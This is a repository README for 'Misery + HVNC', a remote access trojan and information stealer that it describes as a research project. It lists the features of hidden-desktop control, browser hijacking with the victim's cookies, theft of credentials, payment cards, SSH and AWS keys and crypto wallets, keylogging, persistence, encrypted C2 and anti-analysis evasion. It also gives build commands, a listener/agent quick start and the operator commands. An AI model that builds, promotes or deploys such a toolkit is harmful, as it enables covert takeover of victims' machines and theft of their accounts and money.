Files
JYenn-Misery/README.md
T

2.7 KiB

Misery + HVNC

Misery
a devoted sister of the Church of Malware

HVNC RAT + stealer research project (Misery-derived). For local testing and research only.

  • Hidden desktop (hvnc start): GDI apps on a hidden desktop, streamed live
  • Interactive browser (hvnc launch chrome): real Chromium with the victim's logins, driven over CDP
  • Ghosted browser (ghost <url>): hidden Chrome/Edge session using the victim's cookies and logins
  • Credential and app-session harvesting: Chrome, Edge, Brave, Opera, Opera GX, Firefox; payment cards, Discord, Steam, Telegram, Slack, VS Code, AWS, SSH keys, Wi-Fi passwords, wallet extension paths, and a Signal session file listing
  • Single encrypted C2 channel: reverse TCP (default) or HTTPS beaconing through a CDN
  • Keylogger + clipboard monitoring
  • Persistence (HKCU Run key + WMI event subscriptions)
  • Anti-analysis (user-mode environment checks) + reflective injection

Misery operator view

VirusTotal

VirusTotal scan result

Quick start

setup.py writes src/config.h, the console's ECDH key to .misery_key, and builds the project:

python setup.py -g
# or non-interactive:
python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -o agent
.\build\console.exe   # listener
.\build\agent.exe     # connects

Commands: steal, hvnc start | stop | launch [path] | quality [10-100], ghost <url> | nav <url> | stop, keylog, clip, clear, exit (type help for the full list).

Build

Requires cmake and a C++ toolchain (MSVC, MinGW, or Clang).

cmake -S . -B build -G "Visual Studio 17 2022" -A x64
cmake --build build --config Release

MinGW:

cmake -S . -B build -G "MinGW Makefiles" -DCMAKE_BUILD_TYPE=Release
cmake --build build -j 4

Fresh checkout builds against 127.0.0.1:4444; run setup.py once so .misery_key exists.

Layout

  • src/agent: entry, C2 client, injector, persistence
  • src/console: operator console + listener
  • src/payload: payload DLL, reflective loader, trampoline
  • src/stealer: Misery-derived sources
  • src/hvnc: hidden-desktop session
  • src/ghost: ghosted browser session
  • src/browser: CDP client (Page/Input over WebSocket)
  • src/rat: keylogger + clipboard
  • src/transport: encrypted TCP framing, HTTPS beacon carrier, compression
  • src/evasion: indirect syscalls, anti-analysis, helpers
  • build/: out-of-source build dir

Licence

No licence granted. Research code for study only; not licensed for redistribution or commercial use.